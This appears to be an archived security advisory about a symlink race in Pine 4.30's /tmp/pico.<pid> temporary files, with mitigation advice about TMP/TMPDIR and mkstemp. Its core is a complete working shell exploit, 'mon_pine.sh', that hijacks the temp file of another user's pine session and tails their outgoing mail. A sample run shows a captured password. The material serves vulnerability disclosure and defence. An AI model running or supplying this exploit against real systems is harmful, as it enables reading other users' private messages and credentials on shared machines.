COMMAND

    pine

SYSTEMS AFFECTED

    Pine Version 4.30 (or maybe other versions)

PROBLEM

    Following is based on a Hacksware Bug Report.  If pine setting  is
    like following:

        [x]  enable-alternate-editor-cmd
        [x]  enable-alternate-editor-implicitly
        editor                   = /usr/bin/vi

    pine creates it's temporary in  in /tmp directory with names  like
    /tmp/pico.007292(where 7292 is the pid of pine process running).

    You can simply symlink this file(/tmp/pico.<pid>) to another  file
    that doesn't exist.  When victim is editing message victim  editor
    vi follows symlinks  and creates another  file.  By  removing this
    symlink  and  creating  your  own  temporary  file  and  making it
    writable to victim, you can hijack his mail message.

    Exploit:

    #!/bin/sh
    # Grab local pine messages
    # Usage: ./mon_pine.sh <pid of pine process>
    # victim pine must use following settings
    #
    #  mat@hacksware.com
    #  http://hacksware.com
    #
    # [x]  enable-alternate-editor-cmd
    # [x]  enable-alternate-editor-implicitly
    # editor                   = /usr/bin/vi
    #
    
    PID=$1
    PICO_FILE=`printf "/tmp/pico.%.6d" $PID`
    TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`
    echo PICO_FILE is $PICO_FILE
    
    #if $PICO_FILE and $TRASHCAN exists, remove them
    if test -f $PICO_FILE
    then
     rm -f $PICO_FILE
    fi
    if test -f $TRASHCAN
    then
     rm -f $TRASHCAN
    fi
    
    ln -s $TRASHCAN $PICO_FILE
    while :
    do
     if test -f $TRASHCAN
     then
      break
     fi
    done
    
    echo Victim is Editing Pine Message
    rm -f $PICO_FILE
    echo We replace temporary file
    touch $PICO_FILE
    chmod 777 $PICO_FILE
    echo "Get the message from "$PICO_FILE
    echo "^C to break tailer"
    tail -f $PICO_FILE

    Example:

    [mat@overheaven /tmp]$ ps -ax|grep pine|grep -v grep
     7292 pts/1    S      0:22 pine
    [mat@overheaven /tmp]$ sh mon_pine.sh 7292
    PICO_FILE is /tmp/pico.007292
    
    ... wait for victim to compose mail....
    
    Victim is Editing Mail
    We replace temporary file
    Get the message from /tmp/pico.007292
    ^C to break tailer
    
    Hello...
    
    Your new password is "greenbee"
    
    Don't let anyone know this...
    Thanks..

    By  setting  $TMP  and  $TMPDIR  this  still works!  This has been
    tested  under  Solaris  8,  pine  4.30,  and  with  both  $TMP and
    $TMPDIR set, Pine is still writing to /tmp.

SOLUTION

    Some people tried this on  their boxes, and couldn't get  the same
    result.  They had TMP and TMPDIR environment variables set.  Using
    'strace' we  can see  Pine work  with temp  files in the directory
    specified by TMP and TMPDIR.  So, once again, TMP/TMPDIR trump the
     /tmp default.

    Sure, it would be nice if all apps were safe in their use of  temp
    files.  It  would be nice  if there was  an easy, portable  way to
    ensure safe temp file operations (mkstemp()?) but in the meantime,
    don't panic.  Set safe values for TMP and TMPDIR and Pine  behaves
    well.  Note that this won't help You on Solaris!?

    So many  of these  problems would  just disappear  if the system's
    default   profile   had   something   like   "$TMPDIR=$HOME"    or
    "$TMPDIR=$HOME/tmp".  Pine is not really the problem.  Also, real
    problem  here  is  the  use  of  '$$'  in temporary file creation.
    mkstemp(3) is there for a reason.